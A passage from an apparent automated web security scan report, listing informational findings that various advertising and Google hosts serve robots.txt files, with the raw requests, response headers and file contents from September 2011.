HTTP/1.1 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 04:00:33 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

27.46. http://dis.sv.us.criteo.com/dis/dis.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dis.sv.us.criteo.com
Path:   /dis/dis.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dis.sv.us.criteo.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 03:57:31 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

27.47. http://dna1.mookie1.com/n/97164/98396/www.bp.com/1979rp7  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dna1.mookie1.com
Path:   /n/97164/98396/www.bp.com/1979rp7

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dna1.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:14:57 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 10 Dec 2010 04:06:03 GMT
ETag: "20070-1a-7907e0c0"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

27.48. https://docs.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://docs.google.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 04:15:00 GMT
Expires: Sun, 04 Sep 2011 04:15:00 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Allow: /$
Allow: /support/
Allow: /a/
Allow: /Doc
Allow: /View
Allow: /ViewDoc
Allow: /present
Allow: /Present
Allow: /TeamPresent
Allow: /EmbedSlideshow
Allow: /templates
Allow: /previe
...[SNIP]...

27.49. http://domdex.com/nai_optout_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://domdex.com
Path:   /nai_optout_status.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: domdex.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:00:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 21 Apr 2011 18:47:36 GMT
ETag: "fe0543-fd-4a1722cc08200"
Accept-Ranges: bytes
Content-Length: 253
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="ALL CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Connection: close
Content-Type: text/plain; charset=UTF-8

# Domdex Robots Rules
# Last update: 20091109 114151 - esammer

User-Agent: *
Disallow: /c?*$
Disallow: /f?*$
Disallow: /g?*$
Disallow: /i$
Disallow: /l?*$
Disallow: /m?*$
Disallow: /o?*$
Disallow: /r
...[SNIP]...

27.50. http://dp.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dp.33across.com
Path:   /ps/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dp.33across.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:42:51 GMT
Server: Apache
Last-Modified: Thu, 21 Jul 2011 21:51:49 GMT
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /


27.51. http://events.adchemy.com/visitor/auuid/nai-status  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.adchemy.com
Path:   /visitor/auuid/nai-status

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: events.adchemy.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1309997551000"
Last-Modified: Thu, 07 Jul 2011 00:12:31 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 04 Sep 2011 10:59:22 GMT
_onnection: keep-alive
Connection: close

User-agent: *
Disallow: /

27.52. http://fetchback.com/serve/fb/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fetchback.com
Path:   /serve/fb/optout

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:15:20 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 24 Aug 2011 14:57:15 GMT
Accept-Ranges: bytes
Content-Length: 206
Cache-Control: max-age=0
Expires: Sun, 04 Sep 2011 11:15:20 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007.
## Updated: November 16th 2007.
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Disallow: /adodb495a
Disallow: /adodb5
Disallow: /a
...[SNIP]...

27.53. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sat, 03 Sep 2011 23:16:36 GMT
Expires: Sun, 04 Sep 2011 23:16:36 GMT
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 17911

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

27.54. http://groups.google.com/groups  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /groups

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: groups.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 04:15:08 GMT
Expires: Sun, 04 Sep 2011 04:15:08 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.55. http://ib.mookie1.com/image.sbmx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.mookie1.com
Path:   /image.sbmx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ib.mookie1.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Sat, 20 Nov 2010 00:06:06 GMT
Accept-Ranges: bytes
ETag: "9c851ba4688cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 03:22:34 GMT
Connection: close
Content-Length: 937

...# robots.txt generated at http://www.mcanerin.com
User-agent: Googlebot
Disallow: /
User-agent: googlebot-image
Disallow: /
User-agent: googlebot-mobile
Disallow: /
User-agent: MSNBot
Disal
...[SNIP]...

27.56. http://idiva.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idiva.com
Path:   /index.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: idiva.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:14:39 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 25 Aug 2010 11:59:52 GMT
ETag: "6b8210-d8-48ea49e82de00"
Accept-Ranges: bytes
Content-Length: 216
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /
Disallow: /2db/
Disallow: /captcha/
Disallow: /classes/
Disallow: /fb/
Disallow: /gateway/
Disallow: /genhtml/
Disallow: /inc/
Disallow: /temp/
Disallow: /SolrApi/


...[SNIP]...

27.57. http://images.google.com/support/bin/answer.py  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.google.com
Path:   /support/bin/answer.py

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: images.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 04:15:15 GMT
Expires: Sun, 04 Sep 2011 04:15:15 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.58. http://images.photogallery.indiatimes.com/photo/8179309.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.photogallery.indiatimes.com
Path:   /photo/8179309.cms

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: images.photogallery.indiatimes.com

Response

HTTP/1.0 200 OK
Content-Length: 25
Content-Type: text/plain
Last-Modified: Tue, 10 Aug 2010 09:27:56 GMT
Accept-Ranges: bytes
ETag: "8a25d7506e38cb1:1017"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=87860
Date: Sun, 04 Sep 2011 02:37:38 GMT
Connection: close

User-agent: *
Allow: /

27.59. http://img.pulsemgr.com/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.pulsemgr.com
Path:   /optout

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img.pulsemgr.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 10:59:03 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 05 Dec 2009 01:17:22 GMT
ETag: "266207-46-479f0fc7cec80"
Accept-Ranges: bytes
Content-Length: 70
P3P: policyref="http://img.pulsemgr.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Connection: close
Content-Type: text/plain; charset=UTF-8

# All robots are discouraged from entering.
User-agent: *
Disallow: /

27.60. http://imp.fetchback.com/serve/fb/adtag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:29:10 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...

27.61. http://l.addthiscdn.com/live/t00/250lo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.addthiscdn.com
Path:   /live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Jun 2011 11:39:23 GMT
ETag: "df8ab7-1b-4a51dabdf10c0"
Content-Type: text/plain; charset=UTF-8
Date: Sun, 04 Sep 2011 03:40:55 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *


27.62. http://load.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: load.exelator.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1503889281"
Last-Modified: Tue, 15 Apr 2008 16:21:01 GMT
Content-Length: 27
Date: Sun, 04 Sep 2011 02:36:38 GMT
Server: HTTP server

User-agent: *
Disallow: /

27.63. http://login.dotomi.com/ucm/UCMController  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /ucm/UCMController

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: login.dotomi.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:24:05 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2
X-Name: dmc-s01
Last-Modified: Thu, 02 Sep 2010 18:25:52 GMT
ETag: "c94806a-a2-48f4af1af6c00"
Accept-Ranges: bytes
Content-Length: 162
Connection: close
Content-Type: text/plain

#do not edit this file in ms-platform, you need unix line seperators for it.
#this file will disallow any robots to search the dmc.
User-Agent: *
Disallow: /

27.64. https://mail.google.com/mail/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mail.google.com
Path:   /mail/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mail.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 04:15:27 GMT
Expires: Sun, 04 Sep 2011 04:15:27 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.65. https://maps-api-ssl.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://maps-api-ssl.google.com
Path:   /maps

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: maps-api-ssl.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Mon, 23 Aug 2010 20:46:35 GMT
Date: Sun, 04 Sep 2011 04:15:27 GMT
Expires: Sun, 04 Sep 2011 04:15:27 GMT
Cache-Control: private, max-age=31536000
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.66. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: maps.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 04:15:30 GMT
Expires: Sun, 04 Sep 2011 04:15:30 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.67. https://market.android.com/developer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://market.android.com
Path:   /developer

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: market.android.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 04:15:34 GMT
Expires: Sun, 04 Sep 2011 04:15:34 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /search

27.68. http://media2.legacy.com/bind  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /bind

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: media2.legacy.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /

27.69. http://nai.ad.us-ec.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nai.ad.us-ec.adtechus.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:05:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Sun, 16 Jan 2011 18:42:47 GMT
ETag: "64003c-624-499fb089a17c0"
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 11:05:04 GMT
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.70. http://nai.adserver.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nai.adserver.adtechus.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:04:47 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Sun, 16 Jan 2011 18:42:47 GMT
ETag: "64003c-624-499fb089a17c0"
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 11:04:47 GMT
Keep-Alive: timeout=15, max=67
Connection: Keep-Alive
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.71. http://nai.adserverec.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nai.adserverec.adtechus.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:04:11 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Sun, 16 Jan 2011 18:42:47 GMT
ETag: "64003c-624-499fb089a17c0"
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 11:04:11 GMT
Keep-Alive: timeout=15, max=89
Connection: Keep-Alive
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.72. http://nai.adserverwc.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nai.adserverwc.adtechus.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:05:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Sun, 16 Jan 2011 18:42:47 GMT
ETag: "64003c-624-499fb089a17c0"
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 11:05:02 GMT
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.73. http://nai.adsonar.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nai.adsonar.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:05:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Sun, 16 Jan 2011 18:42:47 GMT
ETag: "64003c-624-499fb089a17c0"
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 11:05:04 GMT
Keep-Alive: timeout=15, max=87
Connection: Keep-Alive
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.74. http://nai.adtech.de/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nai.adtech.de

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:04:41 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Sun, 16 Jan 2011 18:42:47 GMT
ETag: "64003c-624-499fb089a17c0"
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 11:04:41 GMT
Keep-Alive: timeout=15, max=70
Connection: Keep-Alive
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.75. http://nai.advertising.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.advertising.com
Path:   /nai/daa.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nai.advertising.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:04:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Sun, 16 Jan 2011 18:42:47 GMT
ETag: "64003c-624-499fb089a17c0"
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 11:04:06 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.76. http://nai.btrll.com/nai/status  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.btrll.com
Path:   /nai/status

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nai.btrll.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 10:59:09 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Mon, 08 Aug 2011 19:03:54 GMT
ETag: "e58082-1a-1bbf7a80"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

27.77. http://nai.glb.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nai.glb.adtechus.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:04:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Sun, 16 Jan 2011 18:42:47 GMT
ETag: "64003c-624-499fb089a17c0"
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 11:04:53 GMT
Keep-Alive: timeout=15, max=60
Connection: Keep-Alive
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.78. http://nai.tacoda.at.atwola.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nai.tacoda.at.atwola.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:05:21 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Sun, 16 Jan 2011 18:42:47 GMT
ETag: "64003c-624-499fb089a17c0"
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 11:05:21 GMT
Keep-Alive: timeout=15, max=77
Connection: Keep-Alive
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.79. http://ndtvjobs.bixee.com/search/search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ndtvjobs.bixee.com
Path:   /search/search/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ndtvjobs.bixee.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:16:02 GMT
Server: ibibo-WS
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
User-agent: *
Allow: /
Disallow: /redir*
Disallow: /adiframe*
Disallow: /job-seeker/*
Disallow: /vie
...[SNIP]...

27.80. http://netspiderads2.indiatimes.com/ads.dll/getad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netspiderads2.indiatimes.com
Path:   /ads.dll/getad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: netspiderads2.indiatimes.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31104000
Content-Length: 25
Content-Type: text/plain
Last-Modified: Tue, 27 May 2008 12:47:08 GMT
Accept-Ranges: bytes
ETag: "448688c6f7bfc81:4a2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 02:30:27 GMT
Connection: close

User-Agent: *
Allow: /

27.81. http://netspiderads3.indiatimes.com/ads.dll/getad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netspiderads3.indiatimes.com
Path:   /ads.dll/getad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: netspiderads3.indiatimes.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31104000
Content-Length: 25
Content-Type: text/plain
Last-Modified: Tue, 27 May 2008 12:47:08 GMT
Accept-Ranges: bytes
ETag: "448688c6f7bfc81:423"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 02:35:24 GMT
Connection: close

User-Agent: *
Allow: /

27.82. http://news.google.com/news/story  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /news/story

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: news.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 04:16:17 GMT
Expires: Sun, 04 Sep 2011 04:16:17 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
